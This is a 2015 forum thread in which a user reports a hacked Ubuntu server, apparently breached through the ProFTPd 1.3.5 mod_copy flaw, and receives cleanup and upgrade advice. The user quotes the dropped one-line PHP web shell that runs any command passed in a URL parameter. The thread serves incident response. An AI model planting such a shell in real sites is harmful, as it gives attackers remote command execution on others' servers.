My server has been hacked help

guesthere · July 19, 2015, 5:21pm

Hi every one i log to my server today and i see new file created i don’t know who created this file
name of file d.php content of file
proftpd <?php passthru($_GET['cmd']);echo 'm3rg3';?>
and i found backdoor perl can anyone help me i’m using webmine and ubuntu
i see in log lot of attack from china can any one explain to me what happen

Eric · July 20, 2015, 3:27am

Howdy,

Yeah, unfortunately, that kind of thing can happen. It’s likely that the attacker broke in through a vulnerability in a web app, or maybe they guessed one of the passwords for an account in your web app.

First, you’ll want to look around and file any files that don’t belong there.

You can then look at their timestamps, and match that to activity in the Apache access log for that domain.

That may help you identify how they broke in.

You’d definitely want to make sure your web app is fully up to date, along with any plugins it’s running.

-Eric

tpnsolutions · July 20, 2015, 5:42am

Hi,

Drop me a line on Skype tomorrow (Monday) and I’ll see what I can do to help you.


Best Regards,
Peter Knowles
TPN Solutions
Email: pknowles@tpnsolutions.com

Phone: 604-782-9342

Skype: tpnsupport

Website: http://www.tpnsolutions.com

Ask me about my new support plans which include a FREE copy of Virtualmin Pro!!!

guesthere · July 20, 2015, 11:57am

Hi thanks for reply i know but i’m not using any web app and i think i find the exploit it’s porftpd exploit
ProFTPd 1.3.5 - File Copy - Exploits
http://bugs.proftpd.org/show_bug.cgi?id=4169
actualy i disable proftpd
last proftpd log
2015-07-19 00:38:22,950 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session opened.
2015-07-19 00:38:23,441 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): USER ftpuser: no such user found from 59.38.97.174 [59.38.97.174] to ::ffff:213.136.72.38:21
2015-07-19 00:43:22,643 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Login timeout exceeded, disconnected
2015-07-19 00:43:22,685 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Session timed out, disconnected
2015-07-19 00:43:22,688 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session closed.

Eric · July 20, 2015, 4:06pm

Howdy,

It sounds like you disabled ProFTPd – that’s good if you think that’s the issue, you may want to make sure that mod_copy is disabled in ProFTPd.

What distro/version is it that you’re using there though?

-Eric

guesthere · July 20, 2015, 4:22pm

Operating system : Ubuntu Linux 13.10
Webmin version : 1.760

Eric · July 20, 2015, 5:04pm

Ah, Ubuntu 13.10 reached it’s end of life over a year ago. So it’s no longer receiving any updates, including security updates.

There are likely a number of vulnerabilities on your server now.

We’d highly recommend upgrading to a current distribution.

When using Ubuntu, we recommend the Ubuntu LTS releases, as they’re supported for 5 years.

-Eric